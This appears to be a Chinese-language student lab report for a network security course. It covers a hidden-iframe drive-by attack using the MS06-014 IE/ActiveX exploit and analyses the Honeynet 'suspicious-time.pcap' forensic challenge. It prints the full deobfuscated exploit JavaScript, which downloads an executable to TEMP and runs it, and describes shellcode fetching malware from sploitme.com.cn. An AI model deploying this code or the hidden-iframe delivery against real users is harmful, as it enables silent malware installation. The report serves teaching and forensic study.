这里编写一个测试网页 test.html（比较简单），使用iframe标签将漏洞连接嵌入到咱们的测试网页中，这样当用户访问测试网页时候，会一并显示这个页面。同时将高度和宽度设置为0，这样用户就看不见咱们嵌入的这个页面
将 test.html 放入 /var/www/html/ 中，同时打开 apache 服务

保存，当用户访问 http://192.168.200.10/test.html时，就会创建起会话

攻击成功

防守方
首先使用 freshow 分析所给连接，发现里面嵌套有另外一个 URL ，推测应该就是 shellcode 的连接

检查这个连接

发现该网页为了防止被杀毒软件查杀，使用了大量的空白和间隔
去除空白与间隔后（js 解密），代码以下

< html > < head > < title > < /title><script language="javascript">function NMTecHqTwlncd(o,n){var r=null;try{eval("r=o.CreateObject(n)")}catch(e){}if(!r){try{eval("r=o.CreateObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.CreateObject(n,'','')")}catch(e){}}if(!r){try{eval("r=o.GetObject('',n)")}catch(e){}}if(!r){try{eval("r=o.GetObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.GetObject(n)")}catch(e){}}return(r)}function uuAbyFHRrcPdFfbNYhEOQzLI(a){var s=NMTecHqTwlncd(a,"WScript.Shell");var o=NMTecHqTwlncd(a,"ADODB.Stream");var e=s.Environment("Process");var url=document.location+'/payload
';var xml=null;var bin=e.Item("TEMP")+"XHfsyzhkBIAE.exe";var dat;try{xml=new XMLHttpRequest()}catch(e){try{xml=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){xml=new ActiveXObject("MSXML2.ServerXMLHTTP")}}if(!xml){return(0)}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0)}function BeMvp(){var i=0;var t=new Array(' {
    BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E36
}
',' {
    BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E30
}
',' {
    7F5B7F63 - F06F - 4331 - 8A26 - 339E03C0AE3D
}
',' {
    6e32070a - 766d - 4ee6 - 879c - dc1fa91d2fc3
}
',' {
    6414512B - B978 - 451D - A0D8 - FCFDF33E833C
}
',' {
    06723E09 - F4C2 - 43c8 - 8358 - 09FCD1DB0766
}
',' {
    639F725F - 1B2D - 4831 - A9FD - 874847682010
}
',' {
    BA018599 - 1DB3 - 44f9 - 83B4 - 461454C84BF8
}
',' {
    D0C07D56 - 7C69 - 43F1 - B4A0 - 25F5A11FAB19
}
',' {
    E8CCCDDF - CA28 - 496b - B050 - 6C07C962476B
}
',' {
    AB9BCEDD - EC7E - 47E1 - 9322 - D4A210617116
}
',' {
    0006F033 - 0000 - 0000 - C000 - 000000000046
}
',' {
    0006F03A - 0000 - 0000 - C000 - 000000000046
}
',null);while(t[i]){var a=null;if(t[i].substring(0,1)==' {
    '){a=document.createElement("object");a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))}else{try{a=new ActiveXObject(t[i])}catch(e){}}if(a){try{var b=NMTecHqTwlncd(a,"WScript.Shell");if(b){uuAbyFHRrcPdFfbNYhEOQzLI(a);return(0)}}catch(e){}}i++}}</script></head><body onload='
    BeMvp()
    '>EPboqnoNqNOztTdS</body></html>

能够看到调用了 document.location 加载了 payload，而且下一行中后面跟了一个可执行文件 XHfsyzhkBIAE.exe;。下面给出的那个数组比较可疑了，上网搜索果真是 ms06-14 漏洞。

2.4 取证分析挑战实践： Web 浏览器遭遇攻击

经过分析如下给出的网络记录 pcap 文件（suspicious-time.pcap Sha1 : 1f 100c8a4996fafa80d47202881a17796941fd337）, 回答如下问题并撰写实践分析报告。

1. 列出在捕获文件中的应用层协议类型， 你认为攻击是针对哪一个或哪些协议的？
2. 列出捕获文件中的 IP 地址、主机名和域名。从这些信息中你能猜出攻击场景的环境配置状况吗？
3. 列出捕获文件中的全部网页页面， 其中哪些页面包含了可疑的、多是恶意的
   JavaScript 脚本代码？谁在链接这些页面？请描述恶意网页的攻击目的？
4. 请给出攻击者执行攻击动做的概要描述。
5. 攻击者引入了哪些技巧给你的分析带来了困难，请提供在以前问题中识别的恶意
   JavaScript 脚本内容，并对它们进行解码或解密。
6. 攻击者的目标是哪一个操做系统，哪些应用软件，哪些安全漏洞？如何阻止这些攻击？
7. Shellcode 执行了哪些动做？请列出 Shellcode 的 MD5，并比较它们之间的差别？
8. 在攻击场景中有二进制可执行恶意代码参与吗？它们的目的是什么？

列出在捕获文件中的应用层协议类型， 你认为攻击是针对哪一个或哪些协议的？
使用 chaosreader 生成文件

查看一下数据包，没有针对 ICMP，Bootps，Netbios 或 DNS 协议的攻击。针对的协议应该是 HTTP。

列出捕获文件中的 IP 地址、主机名和域名。从这些信息中你能猜出攻击场景的环境配置状况吗？
使用命令for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort –u

Rapidshare.com.eyu32.ru网站应该伪造了一个知名品牌，攻击者可能会利用它对用户进行网上钓鱼。ip 地址为 192.168.56.50
sploitme.com.cn，该名称实际上暗示着某些恶意或游戏（恶意的），网站是不存在的（未找到 DNS 域名）。ip 地址为 192.168.56.52
shop.honeynet.sg 应该是一个购物网站的服务器，是正常的。ip地址为 192.168.56.51。
honeynet.org 是另外一个知名的组织网站，应该是正常的
剩下的谷歌分析网站应该也是正常的

使用命令tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$10}' | sort -u筛选出 NBNS 协议，咱们知道 NBNS 协议的做用是基于 NetBIOS 名称访问的网络上提供主机名和地址映射方法，也就是提供主机名称。

这四个不一样 ip 地址的主机分别映射的主机名是相同的
使用命令tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u

这四个 ip 地址的主机在同一个工做组
而经过 arp 协议筛选咱们能够发现，这四个 ip 地址所对应的 mac 地址是不一样的

经过上述分析，能够推断这四台主机相同的（或者克隆的），但具备四个网卡，那么攻击场景的环境应该是在 VM 环境中。
具体以下：服务：10.0.2.2, 10.0.3.2, 10.0.4.2, 10.0.5.2 （DHCP 服务和网关），192.168.1.1 （DNS 服务）。
受害者：10.0.2.15, 10.0.3.15, 10.0.4.15,10.0.5.15 。
模拟被侵入主机：192.168.56.50 ( “rapidshare.com.eyu32.ru”)、192.168.56.51 (“shop.honeynet.sg”)。
攻击者：192.168.56.52 ( “sploitme.com.cn”)。

列出捕获文件中的全部网页页面， 其中哪些页面包含了可疑的、多是恶意的
JavaScript 脚本代码？谁在链接这些页面？请描述恶意网页的攻击目的？
打开session_0006.part_01.html发现了以下界面，这应该是一个钓鱼网站，显然是恶意建立的对应的就是rapidshare.com.eyu32.ru/login.php。

那咱们找sploitme.com.cn，发现 404 NotFound 了，这个对应文件session_0007.part_02.html。

下面找shop.honeynet.sg/catalog/，对应文件session_0032.part_01.html。

请给出攻击者执行攻击动做的概要描述。
攻击者将恶意 javascript 代码注入指向sploitme.com.cn/?click=X的隐藏iframe。当访问者查看这些页面时，它们首先被重定向到sploitme.com.cn/fg/show.php?s=X，该页面经过302 FOUND标头重定向到伪造的404页面（数据包6三、17四、366）。而后在该页面中，检查用户代理字符串，着陆点和其余参数，并（show.php）发出另外一个javascript代码，该代码尝试各类攻击以在受害者的计算机中执行代码。若是任何漏洞利用成功，则客户端的计算机将下载并执行位于sploitme.com.cn/fg/load.php?e=X的文件，恶意软件访问www.honeynet.org。

攻击者引入了哪些技巧给你的分析带来了困难，请提供在以前问题中识别的恶意
JavaScript 脚本内容，并对它们进行解码或解密。

• javaScript 混淆与加密，以下图所示：
  

• 恶意页面假装成看起来像404页面：

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <meta name="robots" content="noindex"> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /fg/show.php was not found on this server.</p> <script language='JavaScript'> [some script] </script> <noscript></noscript> </body></html>

• 发送给受害者的漏洞利用程序取决于受害者使用的浏览器，这使得肯定漏洞利用者变得更加困难

• 该漏洞利用程序不容许同一客户端访问两次。

攻击者的目标是哪一个操做系统，哪些应用软件，哪些安全漏洞？如何阻止这些攻击？
首先咱们追踪TCP 142号流，能够查看到这是一个针对Windows XP系统的，主要攻击目标是IE浏览器漏洞和含有ActiveX组件漏洞的。

能够经过修补操做系统和应用程序，进行按期更新以及使用“ ActiveX杀手”或彻底使用其余Web浏览器来防止攻击。

Shellcode 执行了哪些动做？请列出 Shellcode 的 MD5，并比较它们之间的差别？
Shellcode获取系统临时文件路径，加载urlmon.dll，从 URL http://sploitme.com.cn/fg/load.php?e=1检索可执行文件，而后执行它。 Shellcode 之间的惟一区别是对load.php脚本的请求中的e变量，该变量指定发送恶意软件可执行文件。

在攻击场景中有二进制可执行恶意代码参与吗？它们的目的是什么？
有。目的是在受害者主机上经过 Internet Explorer 加载 www.honeynet.org

3.学习中遇到的问题及解决

• 问题1：遇到了一大堆问题，好比如何利用 Metasploit 进行混淆，好比最后一个实践如何分析等等
• 问题1解决方案：没有找到很好的解决方案，该不会的仍是不会

4. 学习感想和体会

此次实验太难了，超出了本身的能力范围

参考资料

网络攻防技术与实践